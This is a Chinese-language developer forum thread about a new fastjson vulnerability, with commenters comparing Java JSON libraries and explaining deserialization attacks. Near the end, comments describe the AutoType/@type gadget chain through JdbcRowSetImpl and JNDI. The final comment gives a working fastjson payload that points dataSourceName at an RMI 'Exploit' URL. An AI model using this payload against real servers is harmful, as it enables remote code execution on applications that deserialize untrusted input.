fastjson 又爆 bug 了!快来看看是否受影响

bugjson

出于什么考量用这个库呢？

jackson 不香吗？

感觉这个库从 N 多年前就各种各样安全漏洞。。。

但是 jackson 的话，不支持 JSONArray 和 JSONObject 抽象。
有时候不想对某些 json 再做模型定义，然后用 JsonNode 的 API 太麻烦，全程用 LinkedHashMap 和 ArrayList 写起来也不太好看。

已经因为 bugjson，升了 N 次版本了。。。

没用过，不过很奇怪，一个 JSON 库什么会有安全漏洞...

@AngryMagikarp 反序列化

@qwerthhusn JsonNode 很好用，超级方便，你是没领悟到它正确用法。

Jackson 也一堆漏洞,经常有报 case....
别以为用 jackson 就安全啊.....

@raphael008 哈哈哈哈，jackson 多少安全漏洞，国内没有报导而已。

没影响，一直是 jackson

@AngryMagikarp #6 因为 json 会用在参数解析上，可以构建特殊 json 远程执行代码....

Spring 自带 Jackson，我又不喜欢额外引入过多依赖，一直就用 Jackson 了。

这样有漏洞修补起来也轻松，直接升级 Spring 就行。

@GM 额，我理解错了，我一直以为 JsonNode 就是那种 Low-Level 的语法，要解析各种 Token，刚刚仔细看了一下，和 fastjson 的 JSONArray 和 JSONObject 是类似的。。。。。。不过这套 API 没有 getArrayNode()或者 getObjectNode()，必须要先 get()获取父类，只能强转（或者用 instanceof 或者 getNodeType()检查一下）

从今天开始，fastjson 对我来说，一点用都没了！！！我负责的项目下一个 milestone 中有一项就是 get rid of bugjson

所以 FastJSON 和 Jackson 都不能用？
那么 GSON 如何呢？

上周五也被 bugjson 坑了, {"value":1,"id":2}, 在 bugjson 转一遍输出就变成{"id":2,"value":1}了, 信息没丢,但是在有签名的场景这完全是两个字符串. 不知道为什么这么多人迷信这玩意.

@onikage 所以说你传 json 不会传字符串么，验签后再反序列化

@Kamiyu0087 gson 官方已经弃坑了

@onikage object 本就是无序的，签名前先排序不是常识吗？

JSONObject 呢

@onikage #16 JSONObject 理论上是个哈希表，应该是不保证顺序的，需要签名的场景一般不都是要先做排序的吗

@onikage 明显是你自己对于 json 理解有问题。还能反咬一口框架

@onikage 哈哈，上周也是遇到同样的问题

@onikage 本来就是没有顺序的，还有的语言每次请求都随机顺序输出呢...

@onikage 签名要自己做排序，这是常识。不然的话，出错是必然，工作正常只是偶然（碰巧能正常工作）。

那么到底该用哪个，更安全，性能更好？

fastjson 这个破 json 序列化和反序列化 遵守 json 规范么? 还有号称的性能 呵呵哒
用 jackson 不好么

@AngryMagikarp
因为它支持 @type 把 JSON 映射到对象

@sagaxu 官方有什么声明吗？我用得还挺多的= =

@onikage 这个是你自己个人没保证顺序的原因

一个 json 解析还这么多 bug

@qwerthhusn Jackson 同样支持底层的强大 Node 操作（类似 Object, Array 操作非常简单），也支持高级的 Mapping，而且还支持 XML Mapping 。 还支持其它一些不太常见的格式。在 marshall/unmarshall 操作上，几乎是功能最全面的，在 Spring 是默认方案。

现在的 JSON-P，JSON-B 标准受 Jackson，Gson，JAXB 等影响很大。

喜欢手动装配，用 JSON-P 标准就好了，https://github.com/hantsy/helidon-sample/blob/master/se-start/src/main/java/com/example/EntityUtils.java

Jackson 它不香么

@TomDu 之前看到 gson 作者说过，开发基本上是停止了

JSON 反序列化用哪个库漏洞都很多，都需要经常更新

有点搞吧 验签排序确实是要做 但是你一个 json 库自作主张去排序就有毒了 这还能洗？

龟速的 json 有 bug 么

@AngryMagikarp
比如一只猫，序列化之后是 binary 序列。binary 是没有可读性的，看起来就是一堆乱码。
这时候黑客把一只狗序列化成 binary 序列，替换掉猫的序列。
json 反序列化之后，就会去执行狗的反序列后的代码。

@Vedar 不是去排序，而是这个对象映射是 map，本身就是无序的

问一下各位老哥，有 maven 或 eclipse 、idea 插件提示依赖安全漏洞的插件么

@onikage 你自己的坑

gson 没有 bug 的话，开发基本停止好像也没问题？

@sayuria 我还是有点不明白，就算替换了内容，那也是数据（对象的属性）改变了，代码执行的逻辑还是不变的。可以具体讲解一下“怎么造成安全漏洞”的吗？

一直用 gson 路过~~~

不管谁 bug 多，谁 bug 少。Spring 已经自带了 jackson，那我就懒得引入第三个 json，目前的业务也都满足。小声说：顶多在价格 gson- -!

老老实实用 springboot 默认的 jackson 不好吗，一个 json 工具又不需要中文文档

fastjson
https://help.aliyun.com/noticelist/articleid/1060026793.html
https://help.aliyun.com/noticelist/articleid/1060052050.html
https://help.aliyun.com/noticelist/articleid/1060056174.html
https://help.aliyun.com/noticelist/articleid/1060243541.html
https://help.aliyun.com/noticelist/articleid/1060253179.html
https://help.aliyun.com/noticelist/articleid/1060343604.html
看了下近一年的公告，确实需要蛮频繁地升级……

jackson 不太熟悉，简单搜了下，感觉也不少，抛砖引玉
https://cert.360.cn/warning/detail?id=f3aa86acf2688e0e410dee9e6ab79bc1
https://cert.360.cn/warning/detail?id=1fe3b5ea888750006e0d64fb0df1e6ee
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=jackson

（补充一下，我对漏洞不太了解，这只是搜到的文章和数量，不代表我支持或 diss 任意一方。）

@yuzo555 Go：我怀疑你在说我，但是我没有证据。

@onikage 一般签名场景 都会对字段重新进行排序的吧

Jackson 啥功能都有啊…升级 spring 很方便。

毕竟没有漏洞就没有 kpi

那些一直推荐 Jackson 这个玩意也有漏洞 反序列化的漏洞可以通过 bash 反弹控制服务器呀。

@JasonLaw
JSON 映射到对象其实就是 build and assign，先实例化对象，然后对成员变量赋值，赋值时如果对象有 setXX 方法会调用，在 setXX 方法中可能有一些可以达到代码执行的操作 比如 JNDI injection
比如`com.sun.rowset.JdbcRowSetImpl`，调用它的`setAutoCommit`时会自动对成员变量`dataSourceName`进行一次 JNDI lookup，在低版本 JDK 中就可以直接加载远程字节码

@GM JsonNode + 1, 有的 type safety 都有

高级用法才有 bug，像我这种只用来 JSON.parseObject()和 JSON.toJSONString，从来没有 bug

@whoami9894 产生对象的 class 是自己写的，setXX 能做什么不是完全由自己决定的吗？实例化 class 的一个对象后，会根据序列化之后的内容对属性设置不同的值。如果 setXX 方法除了赋值之外还做了“其他的事情”，不管是什么方式的反序列化，都会做“其他的事情”的呀，不会取决于“序列化的内容是否被修改”。是我哪里没有理解吗？

良心福报厂 养活一批安全从业者

@onikage 兄弟，你这是用法不对啊，哪有 JSON 不排序就做签名的

上边说 jackjson 也有问题的不知道啥心理。
下雨天没有伞房子还漏雨的人说你看隔壁也没伞出门（人家房子完好）。

@sagaxu JakeWharton 最近的推上有说，gson 基本属于弃坑，2/3 的开发者参与了 moshi 开发，moshi 可以认为是 gson3

@murmur
client 和 server 端都在我们自己手里, 可以控制, 中间过了一道 http 的第三方的服务. 问题是这个服务输入输出不一致...
不过这个第三方服务不出错.

@wobuhuicode
问题是中间过的第三方服务做的, 我们自己的 client 和 server 用 http 直连测过以后再连人家服务发现这个问题的.

我用 msgpack……不知道怎么样

@stormsuncc 不知道你是什么心理。都说转 jackson，提出 jackson 也有漏洞，有什么问题？国外的框架有漏洞不让说？

没有高级反序列化，就没有伤害

@ZSeptember 他都说了人家房子完好，说明是选择性失明+失智

没啥好说的啦

一直用的 gson

这玩意不报 bug 才不正常

@TomDu
https://www.reddit.com/r/androiddev/comments/684flw/comment/dgx3gpm
https://twitter.com/JakeWharton/status/1265998249476993026?s=19

有 bug 不是正常?

有点迷，这算是没关注比有关注强吗。。。。
特别有几位大佬一个劲的批判也不知道为啥。。

反序列化注入漏洞，年年都报

@JasonLaw
因为“产生对象的 class 是自己写的”这句话在某些情况下是不对的。
除了常见的“标准”json 外，还存在“标记了反序列化目标类型“的非标准 json 。json 反序列化的大部分漏洞都是通过更改这类 json 的类型标记，实例化一些敏感类进行攻击。

在哪里能看到 fastjson 所有历史缺陷，及 jackson 的所有历史缺陷，想坐下选型前的对比。

对性能有要求的，直接上 protobuf 吧

马上就 618 了，现在紧急更新等于找骂。

fastjson 有个 AutoType 特性，JSON 中会带类型信息 @type ；
JSON 字符串反序列化时，会读取 @type 内容，把 JSON 反序列化成这个对象，并且会调用这个类的 setter 方法;
那么就可以利用这个特性，自己构造一个 JSON 字符串，并且使用 @type 指定一个自己想要使用的攻击类库,比如：com.sun.rowset.JdbcRowSetImpl
在 JdbcRowSetImpl 的 dataSourceName 中设置一个想要执行的命令
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
就可以攻击远程数据库